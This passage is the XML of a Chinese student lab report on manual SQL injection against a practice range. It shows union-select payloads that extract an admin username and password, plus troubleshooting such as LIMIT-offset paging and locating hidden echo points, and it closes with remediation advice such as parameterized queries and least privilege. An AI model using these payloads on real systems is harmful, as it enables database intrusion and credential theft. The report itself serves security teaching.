                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F1A4A31">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第七步：获取管理员账号和密码（最终目标）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF6E8D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既然知道了表名（admin）和字段名（username, password），就可以直接把数据脱出来了。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EEB77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获取用户名： 注入语句 ?id=1 and 1=2 union select 1,group_concat(username) from admin 。页面回显出管理账户名称：admin。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBDE11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213100" cy="1856740"/>
                  <wp:effectExtent l="0" t="0" r="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
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3213100" cy="1856740"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCB62F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获取密码： 注入语句 ?id=1 and 1=2 union select 1,group_concat(password) from admin 。页面回显出对应的密码：hellohack。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4085B44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263900" cy="1904365"/>
                  <wp:effectExtent l="0" t="0" r="0"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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3263900" cy="1904365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AFE1BE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实验成功： 成功拿到后台管理员权限凭证 。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11325408">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="62C73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7" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="566645A8">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>五、实验过程中遇到的问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>及解决</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A627527">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问题1：查询结果显示不全或被截断（无法一次性获取所有数据）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19031B5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遇到情况：在尝试获取数据库所有表名，或使用 GROUP_CONCAT(username) 试图一次性输出所有管理员账号时，页面只返回了第一个表（admin）或单个账号，后面的内容消失了。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5FCA2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原因分析：这是因为目标网站前端页面的“回显点”存在字符长度输出限制，或者其后端的页面模板逻辑被设计为默认只读取并展示查询结果集的第一行数据。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD548B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解决办法：放弃一次性读取的思路，改用 LIMIT x, 1 子句（其中 x 代表偏移量，从 0 开始）。通过手动修改参数（如依次执行 limit 0,1、limit 1,1、limit 2,1），以“逐页遍历”的方式一条条提取数据，直到页面返回空值，从而完整获取了所有的表名和账密信息。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B295BA9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C2608FD">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问题2：联合查询未报错，但网页表面找不到回显数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B7318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遇到情况：在确认了原查询字段数为 2 个之后，传入 UNION SELECT 1,2，或者传入带单引号的测试字符串（如 'hello'）时，页面正常加载且未报错，但屏幕文本中就是看不到预期的数字或内容。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1866C8A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原因分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E08E3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页面结构较复杂，注入的数据可能被后端代码直接渲染到了对用户不可见的 HTML 标签属性中（例如被放进了 &lt;a href="..."&gt; 的链接地址里）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CDB404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靶场环境可能开启了特定防护，对单引号 ' 进行了转义或过滤。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FB69E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解决办法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D7A5A5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改变注入策略，避免使用单引号包裹的字符串，直接使用 database() 或 version() 等无需引号的 MySQL 内置函数进行测试。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDCA42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不再依赖肉眼观察网页表面，而是使用浏览器的开发者工具（F12 或右键“检查”/“审查元素”），深入查看页面的 HTML 源码。最终在标签的代码结构中，成功找出了隐藏的回显数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1300EC7F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F369F9B">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问题3：靶场环境访问异常（504 Gateway Timeout）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A43617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遇到情况：在进行高频次的 SQL 注入探测时，网站偶尔会出现卡顿，甚至直接报错提示 504 Gateway Timeout connect to remote host time out，导致无法继续访问。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FED74A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原因分析：主要是由于靶场远程服务器不稳定、网络波动，或同一时间大量请求导致服务器响应超时。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715B9DF2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>解决办法：排除了本地注入代码导致死循环的可能性后，判定为服务器端问题。暂停测试并等待了一段时间，待靶场服务器自动修复并恢复稳定后，再重新刷新页面继续完成后续实验步骤。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14ADA47B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4213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0" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6EE4EF2F">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>六、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48503E57">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（一）实验结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A73A2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通过手工构造 SQL 注入语句，成功从目标靶场（[http://gognj2dm.aqlab.cn/](http://gognj2dm.aqlab.cn/)）后台数据库中提取出以下核心信息：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C9B5AF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当前数据库名称：maoshe。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D92CA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数据库中的所有表名：共 4 张表，分别为 admin、dirs、news、xss。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C261F3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表中的字段（列）信息：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73ED7CA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admin 表包含 3 个字段：id、username、password。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B49252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dirs 表包含 1 个字段：paths。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54459C5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news 表包含 2 个字段：id、content。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C64662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xss 表包含 3 个字段：id、user、pass。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09BC74D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核心敏感数据（管理员账号密码）：成功获取管理员的用户名 admin 及其对应的密码 hellohack。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C97867">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5234A9CB">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（二）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E108C9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在构造 SQL 注入语句的“调试”过程中，由于后端环境的限制，并非一帆风顺，主要经历了以下排错过程：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56EE7E32">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="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原始查询字段数的探测排错</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C43D94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在使用 ORDER BY 猜测字段数时，输入 order by 2 页面正常，而输入 order by 3 时页面抛出 Fatal error（非对象调用错误）。通过该报错信息，精准“调试”出后台原始 SQL 语句仅查询了 2 个字段，为后续联合查询（UNION）打下了基础。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BB293F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B34B735">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="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回显点隐藏问题的定位与解决</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="720B3D4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在执行 UNION SELECT 1,2 时，页面未直接显示数字，容易误判为注入失败。通过对页面 HTML 源码进行“审查元素（F12）”分析，或调整注入字段的顺序（如测试 UNION SELECT table_name,2 与 UNION SELECT 1,table_name），最终排查出前端页面的第 2 个字段才是有效的文本回显点，成功使数据显现。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3813CD88">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DC63C2B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="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输出截断（显示不全）的调试策略</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A8650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在获取多行数据时，尝试使用 GROUP_CONCAT() 函数试图一次性输出所有结果（如所有账号或表名），但发现前端页面存在字符输出长度限制，导致内容被截断（例如仅显示了 admin）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F22A0C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解决思路：放弃拼接函数，退回使用标准的 LIMIT x, 1 子句。通过修改偏移量参数 x，采用分页遍历的方式逐条提取，成功绕过了前端的显示限制，获取了完整的数据列表。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1484052A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D3DE0B5">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（三）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>实验结果分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59623158">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1. 漏洞成因深度分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4987AA4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本次 SQL 注入攻击之所以能够成功实施，根本原因在于 Web 应用程序的安全设计存在严重缺陷，具体表现在以下几个方面：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121BE7D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代码与数据边界模糊（核心成因）： Web 后端开发人员在编写 PHP 与数据库交互的逻辑时，将前端通过 GET 请求传入的 ?id= 参数直接以字符串拼接的方式动态构造了 SQL 语句。这导致数据库无法区分“原本的代码指令”与“用户输入的数据”，从而将用户传入的恶意代码（如 UNION SELECT）当作合法指令执行。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FD09D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输入验证与过滤缺失： 后端程序在接收到用户输入后，未对数据内容进行任何格式、类型或危险字符（如单引号 '、双引号 "、逻辑运算符等）的验证与转义。这使得攻击者可以通过构造闭合符号（如 id=1' 或 and 1=2）轻易改变原有 SQL 语句的语法树结构。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63910674">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DF8B60A">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 系统安全防范与修复建议</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD3DEB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为了从根本上消除此类安全隐患，保障应用系统与后台数据库的安全，建议在系统开发与运维生命周期中采取以下综合防范措施：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C6871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全面采用参数化查询与预编译语句： 这是防御 SQL 注入最直接有效的方法。在编写 SQL 语句时，应避免直接拼接变量，改用预编译（如 Java 中的 PreparedStatement 对象），使得用户输入仅被当作“纯数据参数”处理，彻底杜绝其被解释为可执行代码的可能。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B547E5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用 ORM（对象关系映射）框架： 在项目重构或新项目开发中，推荐使用 Hibernate 等成熟的 ORM 框架。这类框架底层自带参数绑定和数据验证机制，能够大幅减少直接编写底层 SQL 语句的频率，天然具备极强的防注入能力。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F160C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实施严格的输入验证与过滤机制： 在数据进入后端逻辑前，必须对数据的类型、长度和格式进行严格校验。建议采用“白名单”策略，仅放行符合预期规则的数据；同时，必须对可能引起语法变异的特殊字符进行转义或剔除。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6EBD1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贯彻“最小权限”原则： 合理配置数据库连接账户的权限。例如，针对仅需数据查询的 Web 页面，其对应的数据库账户应仅授予只读权限，严禁赋予插入、修改或删除（DML）甚至跨库查询的权限，以此限制潜在攻击的破坏范围。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2945EBF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规范系统异常与错误处理： 在应用程序发生异常时，严禁将原始的数据库报错信息（包含表结构、SQL 语法错误等敏感信息）直接回显给前端用户。应当统一使用模糊的系统提示，并将详细错误记录在后台日志中供开发人员排查。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B017D2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部署 WAF 与常态化安全审计： 在应用层外部署 Web 应用防火墙（WAF），实时拦截带有恶意 SQL 特征的请求流量。同时，定期使用专门的安全工具对系统进行漏洞扫描，并及时修补已知漏洞，提升整体防线强度。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4514C6FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64A299F4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CC72048">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E25900A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05317177"/>
    <w:p w14:paraId="54DA86DF">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>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6064E9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CE6064E9"/>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rsids>
    <w:rsidRoot w:val="00D31D50"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00443E3E"/>
    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="00601178"/>
    <w:rsid w:val="00654CE7"/>
    <w:rsid w:val="007F0509"/>
    <w:rsid w:val="00807833"/>
    <w:rsid w:val="008B0727"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="00960C5D"/>
    <w:rsid w:val="00973DC7"/>
    <w:rsid w:val="00A2325E"/>
    <w:rsid w:val="00A37B76"/>
    <w:rsid w:val="00A44835"/>
    <w:rsid w:val="00AB0961"/>
    <w:rsid w:val="00B124AB"/>
    <w:rsid w:val="00BC4791"/>
    <w:rsid w:val="00C47A2E"/>
    <w:rsid w:val="00C721B7"/>
    <w:rsid w:val="00D0426E"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D61110"/>
    <w:rsid w:val="00DE6963"/>
    <w:rsid w:val="00DF2E70"/>
    <w:rsid w:val="00E66E21"/>
    <w:rsid w:val="00E70AF7"/>
    <w:rsid w:val="00E73574"/>
    <w:rsid w:val="00EC3668"/>
    <w:rsid w:val="00F17314"/>
    <w:rsid w:val="00F50891"/>
    <w:rsid w:val="00F6708E"/>
    <w:rsid w:val="00F67960"/>
    <w:rsid w:val="00FC46D1"/>
    <w:rsid w:val="01C04E49"/>
    <w:rsid w:val="03280EF8"/>
    <w:rsid w:val="053242B0"/>
    <w:rsid w:val="061A5F76"/>
    <w:rsid w:val="09717ADB"/>
    <w:rsid w:val="13705615"/>
    <w:rsid w:val="1BB91315"/>
    <w:rsid w:val="27280C17"/>
    <w:rsid w:val="2AF94DA4"/>
    <w:rsid w:val="2B876854"/>
    <w:rsid w:val="2E50117F"/>
    <w:rsid w:val="2FAF5BAA"/>
    <w:rsid w:val="33784CD4"/>
    <w:rsid w:val="34504A8E"/>
    <w:rsid w:val="364A2958"/>
    <w:rsid w:val="39034933"/>
    <w:rsid w:val="3FBA53DB"/>
    <w:rsid w:val="447F5EC2"/>
    <w:rsid w:val="472B40E0"/>
    <w:rsid w:val="47B9793D"/>
    <w:rsid w:val="4EDF3034"/>
    <w:rsid w:val="4F500538"/>
    <w:rsid w:val="507A0C6B"/>
    <w:rsid w:val="55DE24D0"/>
    <w:rsid w:val="5B392E17"/>
    <w:rsid w:val="61B2122D"/>
    <w:rsid w:val="64837248"/>
    <w:rsid w:val="64AF7CA6"/>
    <w:rsid w:val="6625578B"/>
    <w:rsid w:val="66CC325D"/>
    <w:rsid w:val="687C4343"/>
    <w:rsid w:val="6E0B2E44"/>
    <w:rsid w:val="6F210EE5"/>
    <w:rsid w:val="713D7696"/>
    <w:rsid w:val="75C00134"/>
    <w:rsid w:val="77FC5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2"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>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jc w:val="center"/>
    </w:pPr>
    <w:rPr>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9">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>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4603</Words>
  <Characters>6008</Characters>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6569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33219</dc:creator>
  <cp:lastModifiedBy>WPS_1718022752</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-27T07:58:18Z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eyJoZGlkIjoiNTYxZDQ1NjczZTlhNjM2YmRmZDQ3MjJiZjkzZmIxZWUiLCJ1c2VySWQiOiIxNjA3MTQ0ODUyIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.28505</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>C92903D111324FE4BA6191104DA02894_12</vt:lpwstr>
  </property>
</Properties>
</file>